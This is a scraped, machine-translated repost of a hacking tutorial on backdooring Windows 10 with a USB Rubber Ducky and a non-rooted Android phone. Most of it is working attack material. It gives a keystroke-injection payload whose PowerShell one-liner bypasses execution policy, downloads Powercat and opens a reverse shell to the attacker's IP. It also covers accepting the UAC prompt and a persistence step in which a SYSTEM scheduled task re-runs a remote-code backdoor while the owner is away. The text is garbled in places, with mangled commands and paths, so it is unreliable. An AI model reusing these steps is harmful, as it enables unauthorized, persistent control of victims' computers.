قالب وردپرس درنا توس
Home / Tips and Tricks / How Backdoor Windows 10 Uses an Android Phone & USB Rubber Ducky «Zero Byte :: WonderHowTo

How Backdoor Windows 10 Uses an Android Phone & USB Rubber Ducky «Zero Byte :: WonderHowTo



With an inconsistent Android phone and USB memory, an attacker can compromise on a Windows 10 computer in less than 15 seconds. Once a root shell has been established, long-lasting endurance to the back door can be configured with just two simple commands – all at the same time bypassing antivirus and Windows Defender.

How this attack works

Powercat is a full-featured PowerShell module. It works much like Netcat and allows PowerShell users to create TCP and UDP tunnels with simple command line arguments. A PowerShell payload will be created to download, import and execute Powercat in a single command. Then it will be encoded into a binary format that USB Rubber Ducky can understand.

With USB Rubber Ducky, Powercat is performed in Windows 1

0 as an administrator who quickly establishes a root shell via the attacker Netcat listener. At that time, persistence was configured with the command schtasks designed by Microsoft to automate tasks and commands in Windows 10.

Prerequisites

Some hardware is required to perform this hack as some of you may have already changed. Below are the four key items.

1. USB Rubber Ducky

USB Rubber Ducky identifies itself as a keyboard when inserted into the computer and then automatically continues to write malicious commands that are pre-programmed into its payload. The load load can be adapted to perform a myriad of advanced functions. The prices of USB Rubber Ducky from Hak5 start at $ 45.

Buy a USB Rubber Ducky from Amazon | Hak5

What USB Rubber Ducky looks like without its shell. Picture of tokyoneon / Null Byte

As an alternative to USB Rubber Ducky, NetHunter and DroidDucky projects can arm Android devices into keystroke injection tools. They require you to change the Android operating system that is outside the article, unfortunately. Both NetHunter and DroidDucky are great projects for those who are willing to change the phone's operating system. Imagine connecting an Android phone to any computer and having it run complex PowerShell payloads in seconds – no USB rubber ducky required.

2nd Android device with UserLAnd Installed

All Android phones or tablets that can run The UserLAnd app will be suitable. The device need not be rooted. All that is required is internet access via Wi-Fi and the above-mentioned UserLAnd application.

Shop for unlocked Android phones on Amazon

3. OTG Adapter (conditional)

After creating the PowerShell payload (in a later step), it must be moved to the microSD card in UBS Rubber Ducky. Some Android phone and tablet platform models are equipped with a microSD expansion slot for more storage, so if you have one of them, it's good that you go because you can transfer the file that way.

If the device does not have a microSD slot, then you need an OTG adapter of some kind, allowing you to connect memory cards to your device via the charging port. An all-in-one solution would be Monoprice USB-C microSD Reader if your phone has a USB type C port. Lexar makes a similar product for Micro-USB ports.

Since USB Rubber Ducky comes with a microSD-to-USB adapter, you can choose an OTG adapter that has a female USB type A end to connect the microSD adapter into. If you have a USB -C port on your Android device, Aukey makes a good adapter. For Micro-USB ports, there are many inexpensive options, such as Ugrin's cable.

Picture of tokyoneon / Null Byte

Alternatively, a combination of adapters can get the job done. As you can see below, I use an auxiliary adapter together with an Anchor Portable Card Reader.

Picture of tokyoneon / Null Byte

4. Virtual Private Server (Optional)

A virtual private server (VPS) is required depending on the attack scenario. If a Wi-Fi network is shared with the target device, it is best to embed the attacker's local IP address into the payload. In other scenarios, it may be necessary to deploy a VPS or Ngrok server.

Step 1: Getting Started with UserLAnd

Before moving forward, check out the Distortion's guide on turning an Android phone into a hacking device without root, as well as my WPA2 Wi-Fi Wizard password with Android because they cover the user base Basics and configuration of Kali Linux, Ngrok, and installation of necessary software that will be required to follow this article. [19659004] You must install and configure UserLAnd, create a new file system, and connect to the operating system via SSH with ConnectBot (or JuiceSSH or the built-in SSH client).

Step 2: Update System & Install Essential Software

Like all Unix-based devices, it is a good idea to make sure the installed packages are fully up-to-date before continuing with projects. Be sure to update the system and install the necessary software, and install Java as needed for the USB Rubber Ducky utility, with the commands below.

  sudo apt-get update && sudo apt-get dist-upgrade 

This command can take several minutes to complete depending on available internet speed and Android CPU. Older Android devices take longer to download and decompress packages.

To install the necessary software, use the command below.

  sudo apt-get update && sudo apt-get install utilities netcat gnupg curl wget git nano screen [19659033] Java is required to compile Ducky payload. To install it, use the command below. 

  sudo apt-get install default-jre-headless 

Restart the Android device to ensure that all package and kernel updates come into effect the next time Android encounters UserLAnd Kali OS.

Step 3: Starting Netcat Listener

Based on the attack scenario, there are several ways to configure the Netcat listener that allows remote access to the Windows computer's goals.

In any case, it is a good idea to set the screen so that terminal sessions remain despite the SSH connections being closed. The screen allows users to manage multiple terminal sessions within the same console. Readers are encouraged to learn how to use Screen as it makes it easy to navigate and "delete" multiple terminal sessions without losing data.

To start a new screen session, just type the screen.

screen

use the ifconfig-a command to identify the local IP address used by the system. This IP will be required in the next step when creating the payload.

  ifconfig -a 
  wlan0: flags = 4163  mtu 1500
inet 192.168.0.208 mesh mask 255.255.255.0 broadcast 192.168.0.255
inet6 ::::: prefixes 64 scopeid 0x20 
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX package 95745 bytes 115985231 (110.6 MiB)
RX error 0 fell 0 exceeded 0 frame 0
TX package 44735 bytes 4289090 (4.0 MiB)
TX error 0 dropped 0 exceeded 0 carrier 0 collisions 0 

In UserLAnd Kali OS there will be many available interfaces. The "Wlan0" or "wlan1" interface is likely to hold the device's local IP address (192.168.0.208). VPS users will instead embed the same external IP address used when SSHing into the server. Ngrok users must configure a server and embed the URL into the payload.

Finally, start the Netcat listener with the command below. Netcat -vv-1 -p 1234

Using the port [] -p ) 1234, Netcat will listen ( -l ) to all available interfaces. -vv ( verbose ) will print the target's IP address in the terminal when a new connection is established.

Step 4: Create payload

After Android restarts, UserLAnd launches the app and SSH to the new Kali system. Use nano to create a new "payload.txt" file in the home ( ~ / ) directory.

  nano ~ / payload.txt 

Comments ( REM ) has been added to explain what each line in the payload does.

  REM This first delay stops Ducky for 5.5 seconds to give the target
REM operating system sometime to mount USB as a keyboard device.
SALE 5500
REM Opens the Windows Run prompt.
GUI r
REM Delays .7 seconds to give Run prompt time to open.
DELAY 700
REM Type of PowerShell payload.
STRING powershell / w 1 / C $ a = $ env: TEMP; Set-ExecutionPolicy Bypass; wget https://cutt.ly/cW13i -o $ a ipmo $ a powercat -c 192.168.0.208 -p 1234 -e powershell
REM Press Ctrl + Shirt + Enter to perform PowerShell with administrative permissions.
CTRL-SHIFT ENTER
REM Delay .85 seconds to give UAC prompt time to open.
SALE 850
REM Press Alt + Y to bypass UAC.
ALT y 

PowerShell one-liner goes a lot. There are several commands bound and separated by semicolons.

  • $ a = $ env: TEMP – The target temp directory is set to the variable $ a. This variable is called twice later in the script. First, it acts as the output directory for powercat.ps1 and is called again when it is imported. Using the simple letter $ helps a variable to shorten the total length of the payload. It is more effective than using "C: Users" USERNAME% AppData Local Temp "several times in the payload.
  • Set-ExecutionPolis Bypass – Set-ExecutionPolicy is a security feature of PowerShell that prevents many similar PowerShell payloads from being executed. In several tests I simply found that -ExecutionPolicy was not enough to bypass this security feature. As an administrator, this policy can be bypassed.
  • wget https://cutt.ly/cW13i -o $ a.ps1 – PowerShell is instructed to call a web request ( wget ) and download powercat.ps1 with the abbreviated cutt. suffer URL. This URL links directly to the Powercat GitHub page, but can be changed to the entire URL or other mapped URL. Powercat.ps1 is saved ( -o ) to the temp directory ( $ a ) with the file name "d.ps1". The file name was shortened to a single letter to keep Ducky payload as short as possible.
  • ipmo $ a dpsps – PowerShell's import mode feature is called with the alias ipmo . Again, with the shorter version of the command to keep the Ducky payload card. Powercat.ps1 is imported.
  • powercat -c 192.168.0.208 -p 1234 -e powershell – Finally, Powercat is run and instructed to connect ( -c ) to the attacker server ( 192.168.0.208 ) on port ( -p ) 1234 and running ( -e ) PowerShell when the connection is established. This effectively gives the attack's remote access to a root PowerShell terminal. The REM comments can remain in the payload and do not affect the key press injections. To save and exit the nano-terminal, press Ctrl-x then then then Enter .

Step 5: Encode the load load

USB Rubber Ducky payload cannot be loaded to microSD card in plain text. Instead, Hak5 Duck Encoder is used to convert plain text payload in a binary format.

To clone the Duck Encoder repository, use the command below.

  provided clone https://github.com/hak5darren/ USB-Rubber-Ducky / 

Change ( cd ) to the newly created encoder / directory.

  cd USB-Rubber-Ducky / Encoder / 

And encode payload.txt under the command. This command will use encoder.jar to convert the input ( -i) into the necessary "inject.bin" output ( -o ) binary. The output file name is not arbitrary and must be termed "inject.bin" for Ducky to perform keystroke injection attacks.

  java -jar encoder.jar -i ~ / payload.txt -o inject.bin 
  Hak5 Duck Encoder 2.6.4

Loading file ..... [ OK ]
Loading keyboard files ..... [ OK ]
Loading language file ..... [ OK ]
Loading DuckyScript ..... [ OK ]
DuckyScript Complete ..... [ OK ] 

When it's clear there will be a new "injection.bin" file in the encoder / directory. This can be verified by the command below ls-1 .

  ls -l-rw-r-r--. 1 rot rot 1466 jan 11 11:39 README
-rw-r - r--. 1 rot rot 57535 jan 11 11:39 encoder.jar
-rw-r - r--. 1 rot rot 86 jan 12 01:57 inject.bin
drwxr-xr-x. 2 root root 4096 Jan 11 11:39 resources
drwxr-xr-x. 2 root root 4096 Jan 11 11:39 src 

Step 6: Connect the Ducky MicroSD to the Android device

Use the card reader adapter, internal microSD slot or OTG adapter with card reader, insert the Ducky microSD card into Android unit. The microSD file content can be viewed using Android's download program.

Picture of tokyoneon / Zero Byte

After a few seconds, a new removable device will be available via the download program ( example). Navigate back to Kali OS terminal. Kali OS does not have access to external storage devices (ie the microSD card), so "inject.bin" must first be copied ( cp ) to / sdcard / Download / directory, then copied to microSD using Android OS.

  cp ~ / USB-Rubber-Ducky / Encoder / inject.bin / sdcard / Download / 

And there is now in the download app. [19659085] Android for Hackers: How Backdoor Windows 10 uses an Android Phone & USB Rubber Ducky ” width=”532″ height=”532″ style=”max-width:532px;height:auto;”/>

  Android for Hackers: How Backdoor Windows 10 uses an Android Phone & USB Rubber Ducky

Highlight "inject.bin" and press "Copy to" button. Then copy to the microSD card and securely disconnect the microSD from your Android device.

Step 7: Let Hacking Begin

Insert the USB Rubber Ducky into the target Windows 10 machine and a new connection to the Android device will be established. Nc -vv-1 -p 1234

Ncat: Version 7.70 (https://nmap.org/ncat)

Ncat: Connection from 192.168.0.33.
Ncat: Connection from 192.168.0.33:49672.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C: Windows System32>

Netcat reports a new "Connection from xx.xx.xx.xx" containing the target's IP address. If you run a command such as ls or pwd files are listed in the current directory or print the current directory name.

Step 8: Establish Persistence (Optional)

The first thing to do after creating a reverse shell is to establish endurance if the current connection is lost. This is an optional step but is recommended where long-term utilization is desirable. In Windows 10, there are a lot of ways to establish endurance. Below is an alternative.

The schtasks command can be used to schedule tasks for Windows 10 to automatically perform. For example, it may be possible to get Windows 10 to connect to the attacker server each X minutes. X is an arbitrary time, e.g. 10 minutes or 120 minutes.

Sktasks has a useful functionality to run commands only to get around a target that sees the unchanging split-secondary terminal image created by PowerShell the computer is inactive. So if the screen has gone to sleep or the screen saver is running, it will only attempt to connect to the attacker's server. This is ideal for getting the terminal pop up only when the owner of the computer is away from the device.

The command schtasks has a ~ 175 character limit that can make driving long commands challenging. To quickly get around this, you first create a "backdoor.ps1" containing the Powercat download, importing, running commands.

  echo "IEX (New Object System.Net.WebClient) .DownloadString (& https: // raw. Githubusercontent.com/besimorhino/powercat/master/powercat.ps1 & # 39;); powercat -c 192.168.0.208 -p 2 -e powershell "> C: Application Data Microsoft Windows backdoor.ps1 

The Windows directory is used to store backdoor.ps1 but this site is completely optional. The directory and file name can be changed to better hide the location of the script and prevent the target from inhibiting it. Similarly, the port number ( -p 2 ) can be changed to another port.

Then use schtasks to perform "backdoor.ps1" when the computer becomes idle.

  schtasks / create / f / ru "NT AUTHORITY SYSTEM" / tn "backdoor" / tr "powershell -w 1 -ep bypass C: ApplicationData Microsoft Windows backdoor.ps1" / sc onidle / i 1 
  SUCCESS: The scheduled task "backdoor" has been successfully created. 

Task Scheduler (schtasks) creates a task named ( / tn ) "back door". The task of running ( / tr ) will run the backdoor.ps1 script. The frequency ( / sc ) with which the command is run is set to "onidle" which instructs the computer to run the command only when the device is idle. Finally, the amount in time (in minutes) of the argument / in is specified and set to 1 minute.

In short, a minute after the [target] step away from the computer, it will attempt to perform backdoor.ps1 embedded in the Microsoft directory. Keep in mind, when the target is returned, the connection is automatically linked by Windows 10. The connection will only remain while the target is away from the computer. Restart the Netcat server and wait for the computer to become restless; a new connection will be attempted each time.

Now create a new Netcat listener and wait for the Windows machine to become available.

  nc -vv -l -p 2 
  Ncat: Version 7.70 (https://nmap.org/ncat)

Ncat: Connection from 192.168.0.33.
Ncat: Connection from 192.168.0.33:24276.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C: System32> 

It's great fun to have schtasks. For more on the available arguments use the command schtasks /? and schtasks / Create /? as shown below.

  schtasks / Create /? 

More Android & PowerShell Hacks to come

With an Android and a small USB device, an attacker can cause chaos on a network of the Windows computer. With only 15 seconds of physical access required to carry payloads, an administrative can be established so that the attacker can embed long-lasting endurance into the unit.

Android with UserLAnd works well as a hacking device. However, there are some limitations. The CPU doesn't really have what it takes to run whole frames like Metasploit, Empire and Wine. In future articles, we will have fun with advanced attacks after attacks such as capturing keystrokes and recording audio through the microphone with only Android and PowerShell.

Cover photo and screenshots of tokyoneon / Zero Byte

Source link